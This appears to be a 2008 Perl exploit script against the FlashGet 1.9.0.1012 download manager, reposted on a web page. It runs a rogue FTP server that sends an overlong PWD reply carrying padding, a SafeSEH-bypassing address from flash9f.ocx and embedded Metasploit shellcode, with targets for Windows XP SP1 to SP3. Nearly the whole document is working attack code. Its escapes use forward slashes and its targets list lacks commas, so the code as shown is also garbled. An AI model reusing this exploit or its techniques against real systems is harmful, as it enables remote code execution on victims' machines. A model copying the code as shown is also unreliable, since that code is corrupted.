FlashGet 1.9.0.1012 (FTP PWD Response) BOF Exploit (safeseh)

  1. #!/usr/bin/perl
  2. # k`sOSe 08/17/2008
  3. # bypass safeseh using flash9f.ocx.
  4. use warnings;
  5. use strict;
  6. use IO::Socket;
  7. # win32_exec -  EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
  8. my $shellcode = 
  9. "/x31/xc9/x83/xe9/xde/xd9/xee/xd9/x74/x24/xf4/x5b/x81/x73/x13/x6b".
  10. "/xa3/x03/x10/x83/xeb/xfc/xe2/xf4/x97/x4b/x47/x10/x6b/xa3/x88/x55".
  11. "/x57/x28/x7f/x15/x13/xa2/xec/x9b/x24/xbb/x88/x4f/x4b/xa2/xe8/x59".
  12. "/xe0/x97/x88/x11/x85/x92/xc3/x89/xc7/x27/xc3/x64/x6c/x62/xc9/x1d".
  13. "/x6a/x61/xe8/xe4/x50/xf7/x27/x14/x1e/x46/x88/x4f/x4f/xa2/xe8/x76".
  14. "/xe0/xaf/x48/x9b/x34/xbf/x02/xfb/xe0/xbf/x88/x11/x80/x2a/x5f/x34".
  15. "/x6f/x60/x32/xd0/x0f/x28/x43/x20/xee/x63/x7b/x1c/xe0/xe3/x0f/x9b".
  16. "/x1b/xbf/xae/x9b/x03/xab/xe8/x19/xe0/x23/xb3/x10/x6b/xa3/x88/x78".
  17. "/x57/xfc/x32/xe6/x0b/xf5/x8a/xe8/xe8/x63/x78/x40/x03/x53/x89/x14".
  18. "/x34/xcb/x9b/xee/xe1/xad/x54/xef/x8c/xc0/x62/x7c/x08/xa3/x03/x10";
  19. my @targets = ( "/x82/x01/x02/x30""/x82/x01/x02/x30""/x0b/x02/x01/x30" );
  20. if( !defined($ARGV[0]) or $ARGV[0] !~ /^(1|2|3)$/ )
  21. {
  22.     usage();
  23. }
  24. $ARGV[0]--;
  25. my $sock = IO::Socket::INET->new
  26.                     LocalAddr => '0.0.0.0'
  27.                     LocalPort => '21'
  28.                     Listen => 1, 
  29.                     Reuse => 1 
  30.                     ) || die($!);
  31. while(my $csock = $sock->accept())
  32. {
  33.     print $csock "220 Hello ;)/r/n"
  34.     read_sock($csock);
  35.     print $csock "331 pwd please/r/n";
  36.     read_sock($csock);
  37.     print $csock "230 OK/r/n";
  38.     read_sock($csock);
  39.     print $csock "250 CWD command successful./r/n";
  40.     read_sock($csock);
  41.     print $csock    "257 " . "/x22" . 
  42.             "/x41" x 324 . 
  43.             "/xEB/x06/x90/x90" . # jump ahead
  44.             $targets[$ARGV[0]] . # pop,pop,ret @ flash9f.ocx, thanks macromedia for avoiding /SAFESEH  ;)
  45.             $shellcode .
  46.             "/x90" x 840 .
  47.             "/x22" .
  48.             " is current directory./r/n";
  49.         
  50.     close($csock);
  51.     exit;
  52. }
  53. sub read_sock
  54. {
  55.     my ($sock) = @_;
  56.     my $buf = <$sock>;
  57.     print "[client] -> $buf";
  58. }
  59. sub usage
  60. {
  61.     print "usage: $0 [1,2,3]
  62.   1 -> Windows XP SP1
  63.   2 -> Windows XP SP2
  64.   3 -> Windows XP SP3/n";
  65.     exit;
  66. }
 
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值